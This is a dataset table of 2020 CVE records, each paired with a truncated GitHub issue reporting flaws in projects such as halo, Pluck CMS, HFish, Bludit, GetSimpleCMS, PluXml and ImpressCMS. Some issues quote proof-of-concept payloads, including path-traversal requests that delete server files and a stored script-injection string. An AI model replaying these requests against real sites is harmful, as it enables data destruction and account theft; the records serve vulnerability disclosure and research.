- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%... | An Arbitrary File reading vulnerability in the backend(bypass the Path check) | https://api.github.com/repos/halo-dev/halo/issues/420/comments | 1 | 2019-12-11T10:52:58Z | 2019-12-12T17:13:17Z | https://github.com/halo-dev/halo/issues/420 | 536,292,011 | 420 | 1,445 |
CVE-2020-21526 | 2020-09-30T18:15:24.163 | An Arbitrary file writing vulnerability in halo v1.1.3. In an interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/halo-dev/halo/issues/421"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"22"
] | 22 | https://github.com/halo-dev/halo/issues/421 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"halo-dev",
"halo"
] | <!--
如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。
提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way
-->
**I am sure I have checked**
- [x] [Halo User Guide Documentation ](https://halo.run/docs)
- [x] [Halo BBS](https://bbs.halo.run)
- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%... | An Arbitrary file writing vulnerability in the backend | https://api.github.com/repos/halo-dev/halo/issues/421/comments | 0 | 2019-12-11T11:00:30Z | 2019-12-12T16:21:37Z | https://github.com/halo-dev/halo/issues/421 | 536,295,949 | 421 | 1,446 |
CVE-2020-21527 | 2020-09-30T18:15:24.227 | There is an Arbitrary file deletion vulnerability in halo v1.1.3. A backup function in the background allows a user, when deleting their backup files, to delete any files on the system through directory traversal. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "NONE",... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/halo-dev/halo/issues/422"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "htt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"22"
] | 22 | https://github.com/halo-dev/halo/issues/422 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"halo-dev",
"halo"
] | <!--
如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。
提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way
-->
**I am sure I have checked**
- [x] [Halo User Guide Documentation ](https://halo.run/docs)
- [x] [Halo BBS](https://bbs.halo.run)
- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%... | An Arbitrary file deletion vulnerability in the backend | https://api.github.com/repos/halo-dev/halo/issues/422/comments | 0 | 2019-12-11T11:06:14Z | 2019-12-12T16:32:49Z | https://github.com/halo-dev/halo/issues/422 | 536,298,956 | 422 | 1,447 |
CVE-2020-21564 | 2020-09-30T18:15:24.303 | An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/83"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*",
"matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"434"
] | 434 | https://github.com/pluck-cms/pluck/issues/83 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | Vulnerability location:
/data/inc/file.php line:42

If the file name is '.htaccess', the strpos function returns a result of 0.
Demo:
Upload these two files in the management file interface.

... | Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files | https://api.github.com/repos/pluck-cms/pluck/issues/91/comments | 10 | 2019-12-19T15:37:06Z | 2024-11-01T13:16:25Z | https://github.com/pluck-cms/pluck/issues/91 | 540,390,005 | 91 | 1,449 |
CVE-2020-22481 | 2020-09-30T18:15:24.367 | An issue was discovered in HFish 0.5.1. When a payload is inserted where the password is entered, XSS code is triggered when the administrator views the information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hacklcx/HFish/issues/69"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hack:hfish:0.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A86390E8-D92B-42F3-BFA7-25701D161E0C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding":... | [
"79"
] | 79 | https://github.com/hacklcx/HFish/issues/69 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"hacklcx",
"HFish"
] | In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.
Insert XSS payload where the password is entered

XSS code is triggered when the administrator ... | XSS exists in the information,can get cookie | https://api.github.com/repos/hacklcx/HFish/issues/69/comments | 1 | 2020-03-15T05:35:23Z | 2024-05-26T23:23:17Z | https://github.com/hacklcx/HFish/issues/69 | 581,528,388 | 69 | 1,450 |
CVE-2020-26148 | 2020-09-30T18:15:26.960 | md_push_block_bytes in md4c.c in md4c 0.4.5 allows attackers to trigger use of uninitialized memory, and cause a denial of service (e.g., assertion failure) via a malformed Markdown document. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mity/md4c/issues/130"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:md4c_project:md4c:0.4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "7F455F90-1697-439A-AD24-E7CFFA64C195",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"908"
] | 908 | https://github.com/mity/md4c/issues/130 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"mity",
"md4c"
] | Hi,
While fuzzing md4c 0.4.5 with Honggfuzz, I found out that the md_push_block_bytes() function may use uninitialized memory.
Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/mity/md4c/files/5298987/test01.md.gz)
Issue can be reproduced by running:
```
md2html test0... | Use of uninitialized value in the md_push_block_bytes() function | https://api.github.com/repos/mity/md4c/issues/130/comments | 5 | 2020-09-29T12:42:58Z | 2020-09-29T21:54:14Z | https://github.com/mity/md4c/issues/130 | 711,076,103 | 130 | 1,451 |
CVE-2020-18185 | 2020-10-02T13:15:12.487 | class.plx.admin.php in PluXml 5.7 allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluxml/PluXml/issues/321"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluxml:pluxml:5.7:*:*:*:*:*:*:*",
"matchCriteriaId": "72A017D0-5597-48A0-827E-B3466870F200",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"94"
] | 94 | https://github.com/pluxml/PluXml/issues/321 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluxml",
"PluXml"
] | class.plx.admin.php in PluXml allows attackers to execute arbitrary PHP code by modify the configuration file.
Source /PluXml/core/lib/class.plx.admin.php line 129~140:
```
if(isset($content['config_path'])) {
$newpath=trim($content['config_path']);
if($newpath!=PLX_CONFIG_PATH)... | An vulnerability that can get a webshell | https://api.github.com/repos/pluxml/PluXml/issues/321/comments | 10 | 2019-02-18T06:12:50Z | 2023-01-20T21:21:52Z | https://github.com/pluxml/PluXml/issues/321 | 411,316,776 | 321 | 1,452 |
CVE-2020-18190 | 2020-10-02T14:15:12.657 | Bludit v3.8.1 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /admin/ajax/upload-profile-picture. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/bludit/bludit/issues/978"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "20051CC0-35E9-4FC7-ABE1-BC02C7CF7656",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"22"
] | 22 | https://github.com/bludit/bludit/issues/978 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"bludit",
"bludit"
] | Hi There.
I found Bludit v3.8.1 allows remote attackers to delete arbitrary files via /admin/ajax/upload-profile-picture.
payload:
```
POST /bludit-3-8-1/admin/ajax/upload-profile-picture HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: ... | Arbitrary File Delete - Security | https://api.github.com/repos/bludit/bludit/issues/978/comments | 3 | 2019-03-05T02:50:16Z | 2019-03-29T13:49:45Z | https://github.com/bludit/bludit/issues/978 | 417,089,224 | 978 | 1,453 |
CVE-2020-18191 | 2020-10-02T14:15:12.733 | GetSimpleCMS-3.3.15 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:get-simple:getsimplecms:3.3.15:*:*:*:*:*:*:*",
"matchCriteriaId": "CFE148BE-5E47-42AB-8660-C0F033D83EC3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSt... | [
"22"
] | 22 | https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"GetSimpleCMS",
"GetSimpleCMS"
] | Hi There.
I found GetSimpleCMS-3.3.15 allows remote attackers to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php
payload:
```
GET /GetSimpleCMS-3.3.15/admin/log.php?log=../../../admin/cron.php&action=delete&nonce=babc600c8b8302dfd822f7eba42f846c3ddbb8a5 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla... | Arbitrary File Delete - Security | https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1303/comments | 8 | 2019-03-05T08:11:53Z | 2019-03-05T18:14:21Z | https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303 | 417,168,746 | 1,303 | 1,454 |
CVE-2017-18924 | 2020-10-04T05:15:12.140 | oauth2-server (aka node-oauth2-server) through 3.1.1 implements OAuth 2.0 without PKCE. It does not prevent authorization code injection. This is similar to CVE-2020-7692. NOTE: the vendor states 'As RFC7636 is an extension, I think the claim in the Readme of "RFC 6749 compliant" is valid and not misleading and I also ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://codeburst.io/missing-the-point-in-securing-oauth-2-0-83968708b467"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/oauthjs/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oauth2-server_project:oauth2-server:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "7FFE5BBB-4620-482D-A32F-D416AA7E4ADA",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.1",
... | [
"94"
] | 94 | https://github.com/oauthjs/node-oauth2-server/issues/637 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"oauthjs",
"node-oauth2-server"
] | I would like to report several security vulnerabilities that I found while using this OAuth server library.
The vulnerabilities and their consequences are listed as following:
**Vulnerability 1:** Missing PKCE support for public clients.
**_Consequences:_** As specified in RFC-7636 (https://tools.ietf.org/htm... | Multiple Security Vulnerabilities in Auth and Token Endpoint | https://api.github.com/repos/oauthjs/node-oauth2-server/issues/637/comments | 6 | 2020-07-16T00:26:02Z | 2021-11-21T02:41:44Z | https://github.com/oauthjs/node-oauth2-server/issues/637 | 657,747,248 | 637 | 1,455 |
CVE-2020-25636 | 2020-10-05T13:15:13.490 | A flaw was found in Ansible Base when using the aws_ssm connection plugin as there is no namespace separation for file transfers. Files are written directly to the root bucket, making possible to have collisions when running multiple ansible processes. This issue affects mainly the service availability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
... | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25636"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ansible-c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*",
"matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"552"
] | 552 | https://github.com/ansible-collections/community.aws/issues/221 | [
"Third Party Advisory"
] | github.com | [
"ansible-collections",
"community.aws"
] | ##### SUMMARY
The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen.
##### ISSUE TYPE
- Bug Report
##### COMPONEN... | aws_ssm connection plugin should namespace its file transfers | https://api.github.com/repos/ansible-collections/community.aws/issues/221/comments | 0 | 2020-09-04T15:15:07Z | 2020-10-11T21:34:51Z | https://github.com/ansible-collections/community.aws/issues/221 | 693,282,141 | 221 | 1,456 |
CVE-2020-25635 | 2020-10-05T14:15:13.217 | A flaw was found in Ansible Base when using the aws_ssm connection plugin as garbage collector is not happening after playbook run is completed. Files would remain in the bucket exposing the data. This issue affects directly data confidentiality. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25635"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ansible-c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:ansible:2.10.1:rc2:*:*:*:*:*:*",
"matchCriteriaId": "9C88089F-2A0A-4D2E-915B-C58D7402821C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"212"
] | 212 | https://github.com/ansible-collections/community.aws/issues/222 | [
"Third Party Advisory"
] | github.com | [
"ansible-collections",
"community.aws"
] | ##### SUMMARY
The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. These files remain in the bucket after the play has complete, they are never removed.
##### ISSUE TYPE
- Bug Report
##### COMPONENT NAME
aws_ssm connection plugin
##### ANSIBLE VERSION
ansible 2.10.1rc2
conf... | aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers | https://api.github.com/repos/ansible-collections/community.aws/issues/222/comments | 1 | 2020-09-04T15:25:10Z | 2020-10-02T18:37:38Z | https://github.com/ansible-collections/community.aws/issues/222 | 693,296,526 | 222 | 1,457 |
CVE-2020-26048 | 2020-10-05T15:15:12.170 | The file manager option in CuppaCMS before 2019-11-12 allows an authenticated attacker to upload a malicious file within an image extension and through a custom request using the rename function provided by the file manager is able to modify the image extension into PHP resulting in remote arbitrary code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/7"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8ED1BEA-DDC5-4FB0-BD5B-B8BED225773A",
"versionEndExcluding": "2019-11-12",
"versionEndIncluding": null,
"versionStart... | [
"434"
] | 434 | https://github.com/CuppaCMS/CuppaCMS/issues/7 | [
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | Affected software: CuppaCMS
Type of vulnerability: Remote code execution
Discovered by: Yosri Debaibi
## Description:
The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file... | Authenticated Remote code Execution | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/7/comments | 5 | 2019-11-01T17:33:20Z | 2020-12-10T09:56:08Z | https://github.com/CuppaCMS/CuppaCMS/issues/7 | 516,250,138 | 7 | 1,458 |
CVE-2020-17551 | 2020-10-07T17:15:13.287 | ImpressCMS 1.4.0 is affected by XSS in modules/system/admin.php which may result in arbitrary remote code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/ImpressCMS/impresscms/issues/659"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.impresscms.org/"
},
{
"source": "af854a3a-2127-... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:impresscms:impresscms:1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "92D3930A-EBB1-4375-802C-34E837CCF918",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/ImpressCMS/impresscms/issues/659 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"ImpressCMS",
"impresscms"
] | Payload = **<script>alert('AppleBois');</script>**
Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4
Vulnerable TextBar : ID of the [adsense tag to display this ad]
Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod
Vulnerable TextBar : Name
Reference
https://medium.com/@t... | Stored XSS on ImpressCMS 1.4.0 | https://api.github.com/repos/ImpressCMS/impresscms/issues/659/comments | 11 | 2020-06-18T23:49:04Z | 2020-07-07T11:04:40Z | https://github.com/ImpressCMS/impresscms/issues/659 | 641,612,977 | 659 | 1,459 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.